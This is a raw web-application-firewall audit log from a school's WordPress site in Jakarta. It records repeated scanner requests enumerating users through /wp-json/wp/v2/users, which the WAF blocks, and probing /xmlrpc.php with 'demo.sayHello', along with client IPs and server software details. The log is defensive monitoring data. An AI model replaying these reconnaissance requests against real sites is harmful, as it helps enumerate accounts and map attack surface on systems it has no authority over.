"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656532886926 3272 (- - -) Stopwatch2: 1746656532886926 3272; combined=1406, p1=481, p2=899, p3=0, p4=0, p5=26, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3472c0f-Z-- --fd896641-A-- [08/May/2025:05:22:18 +0700] aBvdGqcs1DvJ_HgMHE_wcwAAAAo 103.236.140.4 39332 103.236.140.4 8181 --fd896641-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd896641-C-- demo.sayHello --fd896641-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd896641-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656538511812 5202 (- - -) Stopwatch2: 1746656538511812 5202; combined=3955, p1=483, p2=3258, p3=27, p4=43, p5=85, sr=65, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd896641-Z-- --8a70fa30-A-- [08/May/2025:05:22:21 +0700] aBvdHacs1DvJ_HgMHE_wdAAAAAw 103.236.140.4 39336 103.236.140.4 8181 --8a70fa30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a70fa30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a70fa30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656541830773 1956 (- - -) Stopwatch2: 1746656541830773 1956; combined=962, p1=323, p2=613, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a70fa30-Z-- --b1ab3c7c-A-- [08/May/2025:05:22:28 +0700] aBvdJCs5rYyn3jlLjjK9cwAAAMk 103.236.140.4 39340 103.236.140.4 8181 --b1ab3c7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1ab3c7c-C-- demo.sayHello --b1ab3c7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1ab3c7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656548163309 3577 (- - -) Stopwatch2: 1746656548163309 3577; combined=2436, p1=443, p2=1858, p3=15, p4=15, p5=61, sr=66, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1ab3c7c-Z-- --0668632c-A-- [08/May/2025:05:22:51 +0700] aBvdO8P9GxxPAbCroFbL2wAAAE4 103.236.140.4 39344 103.236.140.4 8181 --0668632c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0668632c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0668632c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656571045397 2334 (- - -) Stopwatch2: 1746656571045397 2334; combined=964, p1=330, p2=611, p3=0, p4=0, p5=23, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0668632c-Z-- --6852bf27-A-- [08/May/2025:05:22:57 +0700] aBvdQcP9GxxPAbCroFbL3QAAAEc 103.236.140.4 39348 103.236.140.4 8181 --6852bf27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6852bf27-C-- demo.sayHello --6852bf27-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6852bf27-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656577573456 5303 (- - -) Stopwatch2: 1746656577573456 5303; combined=3921, p1=456, p2=3238, p3=24, p4=26, p5=104, sr=66, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6852bf27-Z-- --687b3914-A-- [08/May/2025:05:22:57 +0700] aBvdQacs1DvJ_HgMHE_wdQAAAA0 103.236.140.4 39350 103.236.140.4 8181 --687b3914-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --687b3914-C-- demo.sayHello --687b3914-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --687b3914-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656577618527 4930 (- - -) Stopwatch2: 1746656577618527 4930; combined=3700, p1=437, p2=3053, p3=22, p4=24, p5=95, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --687b3914-Z-- --2946b804-A-- [08/May/2025:05:23:46 +0700] aBvdcqcs1DvJ_HgMHE_wdgAAAAs 103.236.140.4 39358 103.236.140.4 8181 --2946b804-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2946b804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2946b804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656626903429 3300 (- - -) Stopwatch2: 1746656626903429 3300; combined=1412, p1=489, p2=891, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2946b804-Z-- --a032881a-A-- [08/May/2025:05:23:53 +0700] aBvdeacs1DvJ_HgMHE_wdwAAAAg 103.236.140.4 39362 103.236.140.4 8181 --a032881a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a032881a-C-- demo.sayHello --a032881a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a032881a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656633610541 6070 (- - -) Stopwatch2: 1746656633610541 6070; combined=4367, p1=623, p2=3493, p3=31, p4=34, p5=111, sr=122, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a032881a-Z-- --232cd744-A-- [08/May/2025:05:23:53 +0700] aBvdecP9GxxPAbCroFbL4gAAAFc 103.236.140.4 39364 103.236.140.4 8181 --232cd744-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --232cd744-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --232cd744-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656633980253 2289 (- - -) Stopwatch2: 1746656633980253 2289; combined=1023, p1=340, p2=651, p3=0, p4=0, p5=31, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --232cd744-Z-- --6b3ef403-A-- [08/May/2025:05:23:59 +0700] aBvdf8P9GxxPAbCroFbL5QAAAEg 103.236.140.4 39370 103.236.140.4 8181 --6b3ef403-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b3ef403-C-- demo.sayHello --6b3ef403-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b3ef403-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656639312191 5851 (- - -) Stopwatch2: 1746656639312191 5851; combined=4274, p1=537, p2=3515, p3=28, p4=29, p5=96, sr=84, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b3ef403-Z-- --a5aac568-A-- [08/May/2025:05:25:22 +0700] aBvd0sP9GxxPAbCroFbL5wAAAFg 103.236.140.4 39382 103.236.140.4 8181 --a5aac568-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5aac568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5aac568-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656722297741 3567 (- - -) Stopwatch2: 1746656722297741 3567; combined=1507, p1=514, p2=952, p3=0, p4=0, p5=40, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5aac568-Z-- --9e4c5a61-A-- [08/May/2025:05:25:27 +0700] aBvd18P9GxxPAbCroFbL6QAAAEU 103.236.140.4 39386 103.236.140.4 8181 --9e4c5a61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9e4c5a61-C-- demo.sayHello --9e4c5a61-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e4c5a61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656727922655 5469 (- - -) Stopwatch2: 1746656727922655 5469; combined=4122, p1=561, p2=3345, p3=29, p4=32, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e4c5a61-Z-- --75f48258-A-- [08/May/2025:05:32:23 +0700] aBvfd8P9GxxPAbCroFbL7gAAAEQ 103.236.140.4 39408 103.236.140.4 8181 --75f48258-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.116.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.116.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --75f48258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75f48258-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657143845295 3637 (- - -) Stopwatch2: 1746657143845295 3637; combined=1571, p1=516, p2=1015, p3=0, p4=0, p5=40, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75f48258-Z-- --2a861e02-A-- [08/May/2025:05:33:49 +0700] aBvfzSs5rYyn3jlLjjK9eQAAANQ 103.236.140.4 39412 103.236.140.4 8181 --2a861e02-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2a861e02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a861e02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657229003380 2838 (- - -) Stopwatch2: 1746657229003380 2838; combined=1228, p1=424, p2=774, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a861e02-Z-- --a617f142-A-- [08/May/2025:05:33:52 +0700] aBvf0MP9GxxPAbCroFbL8QAAAEY 103.236.140.4 39416 103.236.140.4 8181 --a617f142-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a617f142-C-- demo.sayHello --a617f142-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a617f142-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746657232777558 5449 (- - -) Stopwatch2: 1746657232777558 5449; combined=4145, p1=507, p2=3413, p3=29, p4=32, p5=96, sr=72, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a617f142-Z-- --7ed7e524-A-- [08/May/2025:05:35:56 +0700] aBvgTMP9GxxPAbCroFbL9wAAAEA 103.236.140.4 39434 103.236.140.4 8181 --7ed7e524-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ed7e524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ed7e524-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746657356336259 2920 (- - -) Stopwatch2: 1746657356336259 2920; combined=1319, p1=442, p2=846, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
